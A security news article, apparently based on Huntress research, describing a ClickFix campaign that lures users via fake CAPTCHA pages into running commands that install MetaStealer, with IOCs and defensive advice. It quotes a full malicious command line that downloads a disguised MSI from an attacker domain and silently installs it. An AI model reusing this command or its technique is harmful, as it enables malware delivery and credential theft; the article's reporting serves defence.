Inside the Evolving ClickFix Threat: How Attackers Now Deploy MetaStealer via File Explorer Lures
Share this article
The Shape-Shifting ClickFix Attack: When CAPTCHA Lures Turn Into File Explorer Traps
Security teams face an escalating challenge as threat actors refine social engineering techniques to exploit trusted system workflows. Recent findings from Huntress reveal a sophisticated evolution of the notorious ClickFix attack methodology now leveraging Windows File Explorer and MSI package deception to deploy MetaStealer malware—a dangerous infostealer targeting credentials and sensitive files.
From CAPTCHA to Compromise: The Anatomy of a Modern Attack Chain
The attack begins familiarly: victims searching for legitimate tools like AnyDesk land on a spoofed Cloudflare Turnstile verification page. But unlike classic ClickFix attacks—which prompt users to paste malicious commands into the Run dialog—this variant weaponizes Windows' search protocol:
- The Fake Verification Lure: Users see a "Secure Access Verification" prompt (
alt="Article illustration 3"
loading="lazy">
cmd.exe /c start microsoft-edge:https://anydesk.com/en/download/anydesk.exe & curl hxxps://chat1[.]store/%COMPUTERNAME%.pdf -o %TEMP%\temp.pdf & msiexec /i %TEMP%\temp.pdf /qn & taskkill /f /im cmd.exe
Key technical innovations observed:
- **Hostname Harvesting**: The `%COMPUTERNAME%` environment variable dynamically generates the malicious PDF's subdomain for attacker reconnaissance.
- **MSI Masquerade**: The downloaded "PDF" is actually an MSI package containing:
- A CustomAction DLL for installation routines
- A CAB archive (`Binary.bz.WrappedSetupProgram`) housing:
- `1.js` (cleanup script)
- `ls26.exe` (MetaStealer payload protected by Private EXE Protector)
- **Parallel Legitimate Downloads**: Simultaneous fetching of real AnyDesk installers creates plausible deniability.
Beyond ClickFix: The Bigger Threat Landscape
Huntress also observed two incidents involving **Cephalus ransomware**, which uses DLL sideloading through SentinelOne's legitimate `SentinelBrowserNativeHost.exe`. This technique underscores attackers' growing preference for Living-off-the-Land Binaries (LOLBins) to evade detection.Why Security Teams Must Adapt
Traditional ClickFix mitigations—like blocking the Windows Run dialog—fail against these new variants. Defenders should:- Educate users on unexpected system tool interactions (e.g., File Explorer opening after CAPTCHA checks).
- Monitor
search-msprotocol activations and SMB connections to untrusted hosts. - Analyze MSI packages for hidden CAB files and suspicious custom actions.
- Block IOCs from recent campaigns (see table below).
| Indicator | Type | Description |
|---|---|---|
| anydeesk[.]ink | Domain | Fake Cloudflare Turnstile |
| macawiwmaacckuow[.]xyz | Domain | MetaStealer C2 |
| 0fc76b7f06aa80a43abafc1e9b88348734e327feb306d700c877c6a210fbd5e7 | SHA256 | MetaStealer dropper |
As attackers blend social engineering with trusted system mechanics, the boundary between user error and compromise grows dangerously thin. Continuous tradecraft education—like Huntress' Tradecraft Tuesday sessions—becomes essential to counter these adaptive threats.
Source: Huntress via BleepingComputer